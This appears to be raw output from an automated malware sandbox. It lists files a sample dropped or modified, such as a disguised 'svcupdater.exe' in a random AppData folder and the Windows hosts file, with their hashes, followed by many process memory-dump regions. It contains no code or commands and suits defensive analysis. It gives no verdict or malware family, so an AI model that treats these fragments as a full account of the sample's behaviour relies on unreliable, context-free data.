                                                                                                        • C:\Users\Admin\AppData\Roaming\qnme49ij0f\svcupdater.exe
                                                                                                          Filesize

                                                                                                          19KB

                                                                                                          MD5

                                                                                                          df9c395f5640a450d5aba408567e7226

                                                                                                          SHA1

                                                                                                          b6bf596346dfbb906c282224fec47811101e8df4

                                                                                                          SHA256

                                                                                                          ad4080baa83c70ec3f8c0671b1d75bc85b17def9641be2e02aaf400811410b26

                                                                                                          SHA512

                                                                                                          bf10f921fa71e6c8557949be4981b9ce8704f3c273d6802035049ea40d1361c29f297f9f8642e9bd5753d3d91ddf0be4b3951cbd3f11571f1f6e64e59ad6a33d

                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                          MD5

                                                                                                          bdb25c22d14ec917e30faf353826c5de

                                                                                                          SHA1

                                                                                                          6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                                                                                                          SHA256

                                                                                                          e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                                                                                                          SHA512

                                                                                                          b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                          Filesize

                                                                                                          1KB

                                                                                                          MD5

                                                                                                          b42c70c1dbf0d1d477ec86902db9e986

                                                                                                          SHA1

                                                                                                          1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                                                                                                          SHA256

                                                                                                          8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                                                                                                          SHA512

                                                                                                          57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                                                                                                        • C:\Windows\system32\drivers\etc\hosts
                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          22180538a827e863a4888b4774d09ab9

                                                                                                          SHA1

                                                                                                          a48d1a15db341a4d65e589f7f002d701f89d4b05

                                                                                                          SHA256

                                                                                                          3f8e45ba1f7c7aea846bf846ed0548d77e95a3529f11004eb6ec8a6bfbb07344

                                                                                                          SHA512

                                                                                                          f91a8bac6736bc424efe0e7e6f6167bff6dbdd641b341c730a35ac1872d04ed6ac93ee69a82eff7ce6ddc1b7a69326003705853521b15a11cd9e1754e37ef4a9

                                                                                                        • C:\Windows\system32\drivers\etc\hosts
                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          22180538a827e863a4888b4774d09ab9

                                                                                                          SHA1

                                                                                                          a48d1a15db341a4d65e589f7f002d701f89d4b05

                                                                                                          SHA256

                                                                                                          3f8e45ba1f7c7aea846bf846ed0548d77e95a3529f11004eb6ec8a6bfbb07344

                                                                                                          SHA512

                                                                                                          f91a8bac6736bc424efe0e7e6f6167bff6dbdd641b341c730a35ac1872d04ed6ac93ee69a82eff7ce6ddc1b7a69326003705853521b15a11cd9e1754e37ef4a9

                                                                                                        • \??\pipe\LOCAL\crashpad_4192_SRWTBGLXOVLTXZIE
                                                                                                          MD5

                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                          SHA1

                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                          SHA256

                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                          SHA512

                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                        • memory/468-234-0x0000000000000000-mapping.dmp
                                                                                                        • memory/492-264-0x0000000000000000-mapping.dmp
                                                                                                        • memory/720-318-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/720-311-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/720-299-0x0000000000000000-mapping.dmp
                                                                                                        • memory/852-265-0x0000000000000000-mapping.dmp
                                                                                                        • memory/872-333-0x00007FF782750000-0x00007FF78344A000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/872-383-0x00007FF782750000-0x00007FF78344A000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/872-327-0x00007FF782750000-0x00007FF78344A000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/872-334-0x00007FF782750000-0x00007FF78344A000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/872-346-0x00007FF782750000-0x00007FF78344A000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/872-347-0x00007FFEB81B0000-0x00007FFEB83A5000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/872-332-0x00007FF782750000-0x00007FF78344A000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/872-330-0x00007FFEB81B0000-0x00007FFEB83A5000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/872-384-0x00007FFEB81B0000-0x00007FFEB83A5000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/872-331-0x00007FF782750000-0x00007FF78344A000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/872-329-0x00007FF782750000-0x00007FF78344A000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/996-374-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1084-368-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1376-221-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1660-145-0x00000000063A0000-0x0000000006432000-memory.dmp
                                                                                                          Filesize

                                                                                                          584KB

                                                                                                        • memory/1660-141-0x0000000005550000-0x000000000565A000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.0MB

                                                                                                        • memory/1660-133-0x0000000000400000-0x0000000000428000-memory.dmp
                                                                                                          Filesize

                                                                                                          160KB

                                                                                                        • memory/1660-143-0x00000000054F0000-0x000000000552C000-memory.dmp
                                                                                                          Filesize

                                                                                                          240KB

                                                                                                        • memory/1660-144-0x00000000057F0000-0x0000000005856000-memory.dmp
                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/1660-150-0x0000000008420000-0x000000000894C000-memory.dmp
                                                                                                          Filesize

                                                                                                          5.2MB

                                                                                                        • memory/1660-146-0x00000000069F0000-0x0000000006F94000-memory.dmp
                                                                                                          Filesize

                                                                                                          5.6MB

                                                                                                        • memory/1660-132-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1660-149-0x0000000007D20000-0x0000000007EE2000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.8MB

                                                                                                        • memory/1660-147-0x0000000006900000-0x0000000006976000-memory.dmp
                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/1660-140-0x00000000059D0000-0x0000000005FE8000-memory.dmp
                                                                                                          Filesize

                                                                                                          6.1MB

                                                                                                        • memory/1660-142-0x0000000005480000-0x0000000005492000-memory.dmp
                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/1660-148-0x0000000006790000-0x00000000067E0000-memory.dmp
                                                                                                          Filesize

                                                                                                          320KB

                                                                                                        • memory/1692-295-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1736-370-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1820-266-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2024-375-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2300-320-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2300-323-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/2300-328-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/2568-302-0x0000000076F70000-0x0000000077113000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.6MB

                                                                                                        • memory/2568-335-0x0000000000570000-0x00000000008DC000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.4MB

                                                                                                        • memory/2568-297-0x0000000000570000-0x00000000008DC000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.4MB

                                                                                                        • memory/2580-291-0x0000000000400000-0x0000000000412000-memory.dmp
                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/2580-289-0x0000000000400000-0x0000000000412000-memory.dmp
                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/2580-286-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2580-287-0x0000000000400000-0x0000000000412000-memory.dmp
                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/2704-240-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2748-242-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2764-371-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2816-259-0x00007FF7EC000000-0x00007FF7ECCFA000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/2816-262-0x00007FF7EC000000-0x00007FF7ECCFA000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/2816-257-0x00007FF7EC000000-0x00007FF7ECCFA000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/2816-258-0x00007FF7EC000000-0x00007FF7ECCFA000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/2816-278-0x00007FF7EC000000-0x00007FF7ECCFA000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/2816-279-0x00007FFEB81B0000-0x00007FFEB83A5000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/2816-260-0x00007FFEB81B0000-0x00007FFEB83A5000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/2816-263-0x00007FF7EC000000-0x00007FF7ECCFA000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/2816-261-0x00007FF7EC000000-0x00007FF7ECCFA000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/2816-254-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2816-322-0x00007FFEB81B0000-0x00007FFEB83A5000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/2816-256-0x00007FF7EC000000-0x00007FF7ECCFA000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/2816-321-0x00007FF7EC000000-0x00007FF7ECCFA000-memory.dmp
                                                                                                          Filesize

                                                                                                          13.0MB

                                                                                                        • memory/2864-244-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3012-336-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3012-314-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3052-304-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3068-248-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3136-267-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3136-377-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3136-274-0x0000000000BB0000-0x0000000000F1C000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.4MB

                                                                                                        • memory/3136-273-0x0000000076F70000-0x0000000077113000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.6MB

                                                                                                        • memory/3136-270-0x0000000000BB0000-0x0000000000F1C000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.4MB

                                                                                                        • memory/3136-276-0x0000000000BB0000-0x0000000000F1C000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.4MB

                                                                                                        • memory/3136-277-0x0000000076F70000-0x0000000077113000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.6MB

                                                                                                        • memory/3180-252-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3436-134-0x0000000000180000-0x00000000001DC000-memory.dmp
                                                                                                          Filesize

                                                                                                          368KB

                                                                                                        • memory/3436-139-0x0000000000180000-0x00000000001DC000-memory.dmp
                                                                                                          Filesize

                                                                                                          368KB

                                                                                                        • memory/3440-300-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3512-382-0x000002300C490000-0x000002300C4B0000-memory.dmp
                                                                                                          Filesize

                                                                                                          128KB

                                                                                                        • memory/3512-385-0x00007FF68B090000-0x00007FF68B884000-memory.dmp
                                                                                                          Filesize

                                                                                                          8.0MB

                                                                                                        • memory/3512-395-0x00007FF68B090000-0x00007FF68B884000-memory.dmp
                                                                                                          Filesize

                                                                                                          8.0MB

                                                                                                        • memory/3692-219-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3752-367-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3816-315-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3816-306-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3972-236-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4016-301-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4092-393-0x0000000000E70000-0x0000000000E7C000-memory.dmp
                                                                                                          Filesize

                                                                                                          48KB

                                                                                                        • memory/4092-394-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4148-296-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4192-151-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4196-275-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4204-164-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4288-313-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4320-312-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4332-307-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4332-316-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4496-317-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4692-305-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4700-238-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4736-376-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4740-294-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4740-290-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4740-285-0x000001F86E690000-0x000001F86E6B2000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4740-284-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4748-231-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4772-310-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4856-283-0x0000000000CB0000-0x0000000001182000-memory.dmp
                                                                                                          Filesize

                                                                                                          4.8MB

                                                                                                        • memory/4856-280-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4880-250-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4952-309-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4980-230-0x0000000140000000-0x0000000140022000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4980-253-0x0000000140000000-0x0000000140022000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4980-225-0x0000000140003E0C-mapping.dmp
                                                                                                        • memory/4980-226-0x0000000140000000-0x0000000140022000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4980-227-0x0000000140000000-0x0000000140022000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4980-224-0x0000000140000000-0x0000000140022000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4980-338-0x0000000140000000-0x0000000140022000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/5060-246-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5068-325-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5092-229-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5100-372-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5112-373-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5304-417-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/5304-400-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/105948-387-0x0000000006D90000-0x0000000006DAE000-memory.dmp
                                                                                                          Filesize

                                                                                                          120KB

                                                                                                        • memory/105948-340-0x0000000000000000-mapping.dmp
                                                                                                        • memory/105948-341-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                          Filesize

                                                                                                          120KB

                                                                                                        • memory/105956-366-0x0000000000000000-mapping.dmp
                                                                                                        • memory/106128-358-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/106128-356-0x000001AFD4FC0000-0x000001AFD4FC6000-memory.dmp
                                                                                                          Filesize

                                                                                                          24KB

                                                                                                        • memory/106128-349-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/106128-350-0x000001AFD46D0000-0x000001AFD46EC000-memory.dmp
                                                                                                          Filesize

                                                                                                          112KB

                                                                                                        • memory/106128-351-0x000001AFD4E30000-0x000001AFD4E3A000-memory.dmp
                                                                                                          Filesize

                                                                                                          40KB

                                                                                                        • memory/106128-352-0x000001AFD4FA0000-0x000001AFD4FBC000-memory.dmp
                                                                                                          Filesize

                                                                                                          112KB

                                                                                                        • memory/106128-353-0x000001AFD4F80000-0x000001AFD4F8A000-memory.dmp
                                                                                                          Filesize

                                                                                                          40KB

                                                                                                        • memory/106128-354-0x000001AFD4FE0000-0x000001AFD4FFA000-memory.dmp
                                                                                                          Filesize

                                                                                                          104KB

                                                                                                        • memory/106128-355-0x000001AFD4F90000-0x000001AFD4F98000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/106128-348-0x0000000000000000-mapping.dmp
                                                                                                        • memory/106128-357-0x000001AFD4FD0000-0x000001AFD4FDA000-memory.dmp
                                                                                                          Filesize

                                                                                                          40KB

                                                                                                        • memory/106292-359-0x0000000000000000-mapping.dmp
                                                                                                        • memory/106304-360-0x0000000000000000-mapping.dmp
                                                                                                        • memory/106328-369-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/106328-379-0x00000249DAC99000-0x00000249DAC9F000-memory.dmp
                                                                                                          Filesize

                                                                                                          24KB

                                                                                                        • memory/106328-378-0x00007FFE96020000-0x00007FFE96AE1000-memory.dmp
                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/106328-362-0x0000000000000000-mapping.dmp
                                                                                                        • memory/106492-365-0x0000000000000000-mapping.dmp